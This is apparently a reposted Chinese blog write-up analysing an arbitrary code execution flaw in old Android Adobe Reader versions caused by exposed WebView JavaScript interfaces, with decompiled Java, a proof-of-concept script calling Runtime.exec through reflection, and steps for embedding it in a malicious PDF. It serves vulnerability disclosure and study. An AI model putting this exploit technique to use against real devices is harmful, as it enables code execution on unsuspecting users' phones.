博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Android Adobe Reader 任意代码执行分析(附POC)
阅读量:6303 次
发布时间:2019-06-22

本文共 1973 字,大约阅读时间需要 6 分钟。

livers · 2014/04/18 14:05

0x00 描述


前几天老外在fd还有exploit-db上,公布了Adobe Reader任意代码执行的漏洞。

漏洞编号: 

AdobeReader安装量比较大,又和浏览器容器不同,分析一下。

Android Adobe Reader 调用webview的不安全的Javascript interfaces。

导致可以执行任意js代码。具体查看。

影响版本:

理论上Android Adobe Reader 11.2.0之前的版本多存在,Android version 11.1.3成功利用。

我查看了之前的几个版本例如Android Adobe Reader 11.1.2 如下图,问题也应该存在。

0x01利用


从反编译出来的java代码看

#!javapublic class ARJavaScript{[...]   public ARJavaScript(ARViewerActivity paramARViewerActivity)   {[...]      this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this), "_adobereader");      this.mWebView.addJavascriptInterface(new ARJavaScriptApp(this.mContext), "_app");      this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc");      this.mWebView.addJavascriptInterface(new ARJavaScriptEScriptString(this.mContext), "_escriptString");      this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), "_event");      this.mWebView.addJavascriptInterface(new ARJavaScriptField(), "_field");      this.mWebView.setWebViewClient(new ARJavaScript.1(this));      this.mWebView.loadUrl("file:///android_asset/javascript/index.html");   }复制代码

_adobereader,_app,_doc,_escriptString,_event,_field这几个变量都会存在任意代码执行的问题.

利用代码和之前一样。

#!javafunction execute(bridge, cmd) {   return bridge.getClass().forName('java.lang.Runtime')      .getMethod('getRuntime',null).invoke(null,null).exec(cmd);}if(window._app) {   try {      var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';      execute(window._app, ['/system/bin/sh','-c','echo \"Lorem ipsum\" > ' + path]);      window._app.alert(path + ' created', 3);   } catch(e) {      window._app.alert(e, 0);   }}复制代码

这里不同是构造 恶意的PDF。

首先需要一个PDF编辑器,比如Adobe Acrobat(flash达人pz推荐).

然后添加表单按钮或者书签等,调用事件添加

我这里看了下button最好演示,和老外的那个poc一样基本上.

导入到android虚拟机里,打开,成功复现。

0x02 扩展


一些网盘或浏览器,看看能否调用adobe reader来预览pdf的应用可能会存在这个漏洞,大部分应用都是直接下载pdf到本地。可以再测试一些能预览pdf的邮箱之类的应用。

0x03 修复


新版本的Adobe Reader 11.2.0 tInterface,老版本的用户则在adobereader禁用了表单的js执行。 不知道那些杀毒软件能不能检测到这些恶意poc呢 :)

附上

转载地址:http://nlfxa.baihongyu.com/

你可能感兴趣的文章
“区块链”并没有什么特别之处
查看>>
没有功能需求设计文档?对不起,拒绝开发!
查看>>
4星|《先发影响力》:影响与反影响相关的有趣的心理学研究综述
查看>>
IE8调用window.open导出EXCEL文件题目
查看>>
python之 列表常用方法
查看>>
vue-cli脚手架的搭建
查看>>
在网页中加入百度搜索框实例代码
查看>>
在Flex中动态设置icon属性
查看>>
采集音频和摄像头视频并实时H264编码及AAC编码
查看>>
3星|《三联生活周刊》2017年39期:英国皇家助产士学会于2017年5月悄悄修改了政策,不再鼓励孕妇自然分娩了...
查看>>
linux查看命令是由哪个软件包提供的
查看>>
高级Linux工程师常用软件清单
查看>>
堆排序算法
查看>>
folders.cgi占用系统大量资源
查看>>
路由器ospf动态路由配置
查看>>
zabbix监控安装与配置
查看>>
python 异常
查看>>
last_insert_id()获取mysql最后一条记录ID
查看>>
可执行程序找不到lib库地址的处理方法
查看>>
bash数组
查看>>